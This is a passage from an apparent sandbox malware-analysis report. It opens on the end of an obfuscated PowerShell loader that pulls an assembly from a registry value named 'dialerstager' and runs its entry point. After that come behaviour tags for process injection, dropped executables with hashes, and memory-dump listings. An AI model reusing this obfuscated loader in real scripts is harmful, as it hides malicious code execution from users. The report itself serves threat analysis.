+''+'R'+''+[Char](69)+'').GetValue('d'+[Char](105)+'a'+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                          1⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:4628

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          4KB

                          MD5

                          bdb25c22d14ec917e30faf353826c5de

                          SHA1

                          6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                          SHA256

                          e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                          SHA512

                          b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Filesize

                          53KB

                          MD5

                          124edf3ad57549a6e475f3bc4e6cfe51

                          SHA1

                          80f5187eeebb4a304e9caa0ce66fcd78c113d634

                          SHA256

                          638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

                          SHA512

                          b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          19KB

                          MD5

                          8db953c45ec05891aa6a450faceb6998

                          SHA1

                          bbc9932e47ae87b7742b987af9d8431944473745

                          SHA256

                          0778cb7b12d9df3d965a2063075fecaed05dad4bc3e911c915acfb0f57df87b1

                          SHA512

                          0805325ad0bea82cd218719611da68dab274f7d140aa7c9613b2e7c7f3b347f39acc894819c953cbd9509a9dc2e339e31f3290ab8e74ccf93a5e68960b180a1c

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          c697637a9b17f577fccd7e83a5495810

                          SHA1

                          04e6054584786b88994b0e0a871562227fe2a435

                          SHA256

                          54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164

                          SHA512

                          66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

                        • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                          Filesize

                          3.7MB

                          MD5

                          f5c51e7760315ad0f0238d268c03c60e

                          SHA1

                          85ebaaa9685634143a72bc82c6e7df87a78eed4c

                          SHA256

                          ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                          SHA512

                          d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                        • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                          Filesize

                          3.7MB

                          MD5

                          f5c51e7760315ad0f0238d268c03c60e

                          SHA1

                          85ebaaa9685634143a72bc82c6e7df87a78eed4c

                          SHA256

                          ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                          SHA512

                          d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                        • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                          Filesize

                          119KB

                          MD5

                          d7581dfed2ec35db8fb3af0568b7fedc

                          SHA1

                          2c592c3fada484378744960c6aa6c773f3320d4d

                          SHA256

                          ac9057fdc650c801c3120613a20e0b03ce5a9c89708ef4a7026bd30df71c5ffd

                          SHA512

                          9e8e601935051724a5993665ad25a509086f0d7343b32623e2479ae0216bfeeea66ec71b6761a93700a86a383dd0f3309a6edced1681c7596621c3808c3901fb

                        • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                          Filesize

                          119KB

                          MD5

                          d7581dfed2ec35db8fb3af0568b7fedc

                          SHA1

                          2c592c3fada484378744960c6aa6c773f3320d4d

                          SHA256

                          ac9057fdc650c801c3120613a20e0b03ce5a9c89708ef4a7026bd30df71c5ffd

                          SHA512

                          9e8e601935051724a5993665ad25a509086f0d7343b32623e2479ae0216bfeeea66ec71b6761a93700a86a383dd0f3309a6edced1681c7596621c3808c3901fb

                        • memory/2040-213-0x00007FFEEC210000-0x00007FFEEC2CE000-memory.dmp

                          Filesize

                          760KB

                        • memory/2040-212-0x00007FFEECF50000-0x00007FFEED145000-memory.dmp

                          Filesize

                          2.0MB

                        • memory/2040-211-0x0000000140000000-0x0000000140029000-memory.dmp

                          Filesize

                          164KB

                        • memory/2040-208-0x0000000140000000-0x0000000140029000-memory.dmp

                          Filesize

                          164KB

                        • memory/2696-171-0x0000000000400000-0x0000000000406000-memory.dmp

                          Filesize

                          24KB

                        • memory/2696-165-0x0000000000400000-0x0000000000406000-memory.dmp

                          Filesize

                          24KB

                        • memory/2984-201-0x00007FFECCF90000-0x00007FFECDA51000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2984-202-0x0000020FD5C19000-0x0000020FD5C1F000-memory.dmp

                          Filesize

                          24KB

                        • memory/2984-190-0x00007FFECCF90000-0x00007FFECDA51000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2984-200-0x0000020FD5C19000-0x0000020FD5C1F000-memory.dmp

                          Filesize

                          24KB

                        • memory/3028-176-0x000001BCB64E0000-0x000001BCB64FC000-memory.dmp

                          Filesize

                          112KB

                        • memory/3028-185-0x00007FFECCF90000-0x00007FFECDA51000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3028-186-0x00007FFECCF90000-0x00007FFECDA51000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3028-184-0x000001BCB6620000-0x000001BCB662A000-memory.dmp

                          Filesize

                          40KB

                        • memory/3028-173-0x000001BCB6170000-0x000001BCB6192000-memory.dmp

                          Filesize

                          136KB

                        • memory/3028-183-0x000001BCB6610000-0x000001BCB6616000-memory.dmp

                          Filesize

                          24KB

                        • memory/3028-182-0x000001BCB65E0000-0x000001BCB65E8000-memory.dmp

                          Filesize

                          32KB

                        • memory/3028-181-0x000001BCB6630000-0x000001BCB664A000-memory.dmp

                          Filesize

                          104KB

                        • memory/3028-177-0x00007FFECCF90000-0x00007FFECDA51000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3028-178-0x000001BCB65C0000-0x000001BCB65CA000-memory.dmp

                          Filesize

                          40KB

                        • memory/3028-179-0x000001BCB65F0000-0x000001BCB660C000-memory.dmp

                          Filesize

                          112KB

                        • memory/3028-180-0x000001BCB65D0000-0x000001BCB65DA000-memory.dmp

                          Filesize

                          40KB

                        • memory/4188-139-0x0000000000400000-0x0000000000405000-memory.dmp

                          Filesize

                          20KB

                        • memory/4188-133-0x0000000000400000-0x0000000000405000-memory.dmp

                          Filesize

                          20KB

                        • memory/4628-206-0x00007FFEECF50000-0x00007FFEED145000-memory.dmp

                          Filesize

                          2.0MB

                        • memory/4628-207-0x00007FFEEC210000-0x00007FFEEC2CE000-memory.dmp

                          Filesize

                          760KB

                        • memory/4628-205-0x00007FFECD210000-0x00007FFECDCD1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4740-152-0x00000000077F0000-0x00000000077FA000-memory.dmp

                          Filesize

                          40KB

                        • memory/4740-145-0x0000000005E10000-0x0000000005E76000-memory.dmp

                          Filesize

                          408KB

                        • memory/4740-153-0x0000000007A40000-0x0000000007AD6000-memory.dmp

                          Filesize

                          600KB

                        • memory/4740-150-0x0000000007DC0000-0x000000000843A000-memory.dmp

                          Filesize

                          6.5MB

                        • memory/4740-158-0x00000000089F0000-0x0000000008F94000-memory.dmp

                          Filesize

                          5.6MB

                        • memory/4740-149-0x0000000006A10000-0x0000000006A2E000-memory.dmp

                          Filesize

                          120KB

                        • memory/4740-154-0x00000000079B0000-0x00000000079BE000-memory.dmp

                          Filesize

                          56KB

                        • memory/4740-157-0x0000000007B10000-0x0000000007B32000-memory.dmp

                          Filesize

                          136KB

                        • memory/4740-148-0x0000000072A10000-0x0000000072A5C000-memory.dmp

                          Filesize

                          304KB

                        • memory/4740-147-0x0000000007610000-0x0000000007642000-memory.dmp

                          Filesize

                          200KB

                        • memory/4740-146-0x0000000006460000-0x000000000647E000-memory.dmp

                          Filesize

                          120KB

                        • memory/4740-151-0x0000000007780000-0x000000000779A000-memory.dmp

                          Filesize

                          104KB

                        • memory/4740-144-0x0000000005DA0000-0x0000000005E06000-memory.dmp

                          Filesize

                          408KB

                        • memory/4740-143-0x00000000054B0000-0x00000000054D2000-memory.dmp

                          Filesize

                          136KB

                        • memory/4740-155-0x0000000007A00000-0x0000000007A1A000-memory.dmp

                          Filesize

                          104KB

                        • memory/4740-156-0x00000000079F0000-0x00000000079F8000-memory.dmp

                          Filesize

                          32KB

                        • memory/4740-142-0x0000000005600000-0x0000000005C28000-memory.dmp

                          Filesize

                          6.2MB

                        • memory/4740-141-0x0000000002E90000-0x0000000002EC6000-memory.dmp

                          Filesize

                          216KB